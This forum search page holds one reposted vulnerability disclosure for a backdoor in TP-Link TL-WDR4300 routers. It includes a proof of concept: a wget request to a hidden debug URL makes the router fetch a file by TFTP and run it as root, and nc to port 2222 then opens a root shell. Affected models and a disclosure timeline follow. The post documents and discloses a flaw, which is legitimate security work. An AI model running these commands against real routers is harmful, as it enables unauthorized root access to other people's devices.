Jump to content

Search the Community

Showing results for tags 'http/tftp'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. About the TP-Link Router TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router. Tested Firmware We tested the remote root PoC on the newest firmware (published on 25.12.2012): TL-WDR4300 – tested firmware version The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability. Proof of Concept root@secu:~# nc 192.168.0.1 2222 (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html Connecting to 192.168.0.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s 2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426] root@secu:~# nc 192.168.0.1 2222 ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd Details After the following HTTP request is sent: http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html the router downloads a file (nart.out) from the host which has issed the http request and executes is as root: PoC – diagram Sample captures from the host which issues the http request: Wireshark filter used to show router tftp traffic nart.out tftp request Models affected TL-WDR4300 TL-WR743ND (v1.2 v2.0) … History of the bug 12.02.2013 – TP-Link e-mailed with details – no response 22.02.2013 – TP-Link again e-mailed with details – no response 12.03.2013 – public disclosure More information More information about TP-Link backdoor Source TP-Link http/tftp backdoor
×
×
  • Create New...